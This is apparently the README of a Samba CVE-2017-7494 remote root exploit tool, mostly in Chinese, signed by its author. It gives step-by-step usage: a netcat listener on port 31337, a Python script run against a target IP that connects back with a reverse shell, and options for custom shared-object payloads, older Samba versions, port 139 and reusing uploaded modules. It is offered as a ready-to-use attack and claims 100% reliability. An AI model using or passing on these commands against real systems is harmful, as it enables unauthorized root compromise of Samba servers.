
Remote root exploit for the SAMBA CVE-2017-7494 vulnerability
针对 SAMBA CVE-2017-7494 漏洞的远程 root 漏洞利用。
该漏洞利用分为两部分:
只要目标存在漏洞,且载荷与目标操作系统及架构相匹配,该漏洞利用 100% 可靠。
在你的机器上运行以下命令:
$ nc -p 31337 -l
然后,对目标运行漏洞利用,等待它连接回你的 Netcat:
$ python cve_2017_7494.py -t target_ip
如果你过快关闭反弹 shell,无需重新运行漏洞利用并再次上传模块等,可以直接传递之前已上传模块的路径。假设模块已上传至 /shared/directory/ 并命名为 "module.so",则可运行如下命令:
$ python cve_2017_7494.py -t target_ip -m /shared/directory/module.so
你现在可以对 samba 3.5.0 和 3.6.0 运行漏洞利用,只需添加参数 -o 1:
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -o 1
你现在可以使用自定义的 .so 文件:
python cve_2017_7494.py -t target_ip -u test -P 123456 -o 1 --custom myso.so
如果需要在 x86 机器上运行此脚本,编译植入二进制文件将生成两个 x86 文件。使用参数 -n 1 可禁用编译,并从另一台机器复制 libimplantx64.so。
python cve_2017_7494.py -t target_ip -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
如果 samba 仅在 139 端口上运行,可以使用参数 -p 设置远程服务器端口:
python cve_2017_7494.py -t target_ip -p 139 -u test -P 123456 --rhost shell_ip --rport shell_port -n 1
我不再维护此工具。
-- Joxean Koret